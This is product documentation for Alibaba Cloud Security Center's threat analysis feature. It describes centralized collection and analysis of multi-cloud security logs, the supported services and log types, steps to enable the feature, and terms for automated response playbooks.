Centrally manage alerts and logs of multiple cloud services within different accounts in multiple clouds - Security Center

In the increasingly complex network security environment, organizations and enterprises face challenges on how to effectively monitor and manage large amounts of alerts and logs in distributed systems. To handle these challenges, Security Center provides the threat analysis feature. You can use the threat analysis feature to centrally manage alerts and logs of multiple cloud services within different accounts in a multi-cloud environment. The feature helps you improve O&M efficiency and respond to potential risks.

Background information

How it works

The threat analysis feature provides a cloud-native management solution for security information and events. The feature provides capabilities such as log collection, alert generation, event aggregation and analysis, and event response and orchestration.

The feature collects logs from different accounts and cloud services of multiple cloud service providers. The feature also analyzes the collected logs based on predefined and custom detection rules to identify attacks, build complete attack chains, and generate security events with detailed information. When the feature detects security threats, it enables Security Orchestration Automation Response (SOAR) and handles threat sources in collaboration with related Alibaba Cloud services. The handling operation includes blocking and quarantine. This helps improve the handling efficiency of security events.

Benefits

Standardized data collection
The feature collects various logs, such as alert logs, network logs, system logs, and application logs, across services, accounts, and cloud platforms. This way, data is standardized and context is enhanced.
Multi-dimension threat detection
The feature strengthens the single-point threat detection capabilities of southbound security devices by using threat detection methods, such as multi-source data association analysis, AI image-based computing and inference, and threat intelligence that is updated in real time. The feature provides more than 40 threat detection scenarios and 3 types of event analysis models.
Efficient event investigation
The feature aggregates related alerts to generate security events, and automatically reconstructs the attack timeline and path. The error rate of security events triggered by alerts is only 0.0001%. This enriches event investigation context and accelerates alerting and event handling.
Automated response and orchestration
The feature automatically handles malicious entities based on automatic response rules and playbooks in collaboration with multiple services. The malicious entities include malicious IP addresses, files, and processes. This way, the emergency response experience is streamlined, normalized, and automated.

Supported cloud services and log types

The threat analysis feature supports more than 20 cloud services and more than 50 log types. The following table describes the supported cloud services and log types.

Cloud service provider	Service	Log type
Alibaba Cloud	Security Center	Alert logs, configuration assessment logs, vulnerability logs, and baseline logs of Security Center Logon logs, network connection logs, process startup logs, file read and write logs, failed host logon logs, and failed MySQL and FTP logon logs Account snapshot logs, network snapshot logs, account snapshot logs, process snapshot logs, and port snapshot logs Internet HTTP logs, Internet session logs, Internet Domain Name System (DNS) logs, and DNS logs
	Web Application Firewall (WAF)	Alert logs and flow logs of WAF, and flow logs of WAF 3.0
	Cloud Firewall	Alert logs and flow logs of Cloud Firewall
	Anti-DDoS	Flow logs of Anti-DDoS Proxy (Chinese Mainland), flow logs of Anti-DDoS Proxy, and logs of Anti-DDoS Origin
	Bastionhost	Bastionhost logs
	CDN	Flow logs of Alibaba Cloud CDN (CDN) and flow logs of CDN WAF
	API Gateway	API Gateway logs
	Container Service for Kubernetes (ACK)	Audit logs of Kubernetes resources
	PolarDB	Audit logs of PolarDB-X 1.0 and PolarDB-X 2.0
	ApsaraDB for MongoDB	Run logs and audit logs of ApsaraDB for MongoDB
	ApsaraDB RDS	Audit logs of ApsaraDB RDS
	Virtual Private Cloud (VPC)	Flow logs of VPC
	Elastic IP Address (EIP)	Flow logs of EIP
	Server Load Balancer (SLB)	Layer 7 logs of Classic Load Balancer (CLB) and flow logs of Application Load Balancer (ALB)
	Object Storage Service (OSS)	Batch deletion logs, metering logs, and flow logs of OSS
	Apsara File Storage NAS	Operation logs of NAS NFS
	Function Compute (FC)	Operation logs of Function Compute
	ActionTrail	ActionTrail logs
	CloudConfig	Cloud Config logs
Tencent Cloud	WAF	Alert logs of WAF
Tencent Cloud	Cloud Firewall	Alert logs of Cloud Firewall
Huawei Cloud	WAF	Alert logs of WAF
Huawei Cloud	Cloud Firewall	Alert logs of Cloud Firewall

Scenarios

The threat analysis feature provides a cloud-native management platform for security information and events with multiple capabilities. The feature helps enterprises efficiently manage and respond to security threats and simplifies the security O&M procedure. The feature is suitable for the following scenarios:

Centralized collection and audit of data across cloud environments, accounts, and services
The threat analysis feature collects log data across cloud environments, accounts, and services in a centralized manner. This way, you can view and audit the collected data in the Security Center console by using a management account. The feature helps you monitor security events across cloud platforms and simplifies data analysis and security audit.
Centralized threat operations and monitoring
The threat analysis feature provides a global monitoring and analysis insight that allows you to monitor and manage the threats of multiple services in the Security Center console. This helps enterprises identify and respond to security events at the earliest opportunity.
Global risk analysis and alert denoising
The threat analysis feature reduces the quantity and frequency of alerts, and optimizes the processing of log data by aggregating and filtering alert data. This way, your security team can focus on threats with high priorities, and alert overload and false positives are reduced.
Automated response and handling of security events
The threat analysis feature provides automated response and handling capabilities to help your security team handle the detected threats at the earliest opportunity. For example, the security team can block malicious sources and quarantine affected resources. The feature helps improve the efficiency of response to security events and overall security.

Purchase and enable the threat analysis feature

Go to the Security Center buy page.
Set the Threat Analysis parameter to Yes and configure the Log Storage Capacity of Threat Analysis parameter.
Log on to the Security Center console. In the top navigation bar, select the region in which your asset resides. You can select China or Outside China.
In the left-side navigation pane, choose Detection and Response > Threat Analysis and Response.
On the Threat Analysis and Response page, click Authorize Now.
After the authorization, Security Center automatically creates a service-linked role named AliyunServiceRoleForSasCloudSiem. The threat analysis feature assumes this role to access the resources of your cloud services. For more information about the service-linked role, see Service-linked roles for Security Center.

Changes in the Security Center console after threat analysis is enabled

After you enable the threat analysis feature, the layout of some modules in the Security Center console is changed.

Module

Description

Detection and Response

The Detection and Response module in the left-side navigation pane is renamed Threat Analysis and Response. Pages such as Security Event Handling and Log Search are added to the Threat Analysis and Response module. In addition, the following pages are changed:

Alert Handling: This page is renamed Alerts, which displays information about global alerts of threat analysis.
In the upper-right corner of the Alerts page, you can click Alerts on Host and Container to go to the Alert Handling page.
Attack Awareness: The entry point to the Attack Awareness page is not provided in the left-side navigation pane after threat analysis is enabled.
In the upper-right corner of the Alerts page, you can click View Attack Analysis Results Within Current Account to go to the Attack Awareness page. For more information, see Attack awareness.
Investigation: The entry point to the Investigation page is not provided in the left-side navigation pane after threat analysis is enabled.
In the upper-right corner of the Alerts page, you can click Alerts on Host and Container. On the Alert Handling page, you can click the icon in the Alert Name column to go to the Investigation page. For more information, see View and handle security alerts.

System Configuration > Multi-account Control

The Account Monitored by Threat Analysis tab is added.

On this tab, you can add Alibaba Cloud accounts to the threat analysis feature.

Terms

Before you use the threat analysis feature, you must understand the terms that are related to the feature. The following table describes the terms.

Term	Description
handling policy	A handling policy describes the details of scenario-specific alert handling. A handling policy is generated based on the handling result of an entity in a scenario.
handling task	A handling task describes the details of scope-specific alert handling. The event handling process of an entity in a scenario is divided into multiple handling tasks based on scopes.
entity	An entity is the core object of an alert, which can be an IP address, a file, or a process.
SOAR	SOAR is a solution that provides automated tools and procedures to organize and manage event response measures. SOAR helps enterprises efficiently respond to security events, reduces manual interference, and improves the handling efficiency of events.
playbook	A playbook provided by SOAR is an automated security management process that consists of predefined response policies. A playbook can be automatically executed after specific events are triggered. You can create a playbook in the same manner as you draw a flowchart. A playbook contains start, judgment, action, and end nodes. You can define actions for each component on a canvas in a visualized manner. For example, you can define the network disabling action for the terminal management component.
component	A component is used to connect to an external system or service, such as WAF, Cloud Firewall, a database service, or a notification service. To serve as a connector to an external system or service, a component does not process complex logic. Complex logic is processed by the connected external system or service. After you select a component, you must select resource instances and actions for the component. Components are classified into process orchestration components, basic orchestration components, and security application components.
resource instance	An asset instance specifies an external service to which a component is connected. For example, if you want to use a MySQL component and your enterprise has multiple MySQL databases, you must specify the database to which you want to connect the MySQL component.
action	An action specifies the execution capability of a component. A component can have multiple actions. For example, the terminal management component supports actions such as disabling accounts, isolating networks, and sending notifications.

References

After you enable the threat analysis feature, you can add logs of cloud services to the feature to monitor and analyze alerts and logs across resources in a centralized manner. For more information, see Add logs of cloud services.
Does the threat analysis feature support devices in a data center?
Will the number of alerts be reduced after I enable the threat analysis feature?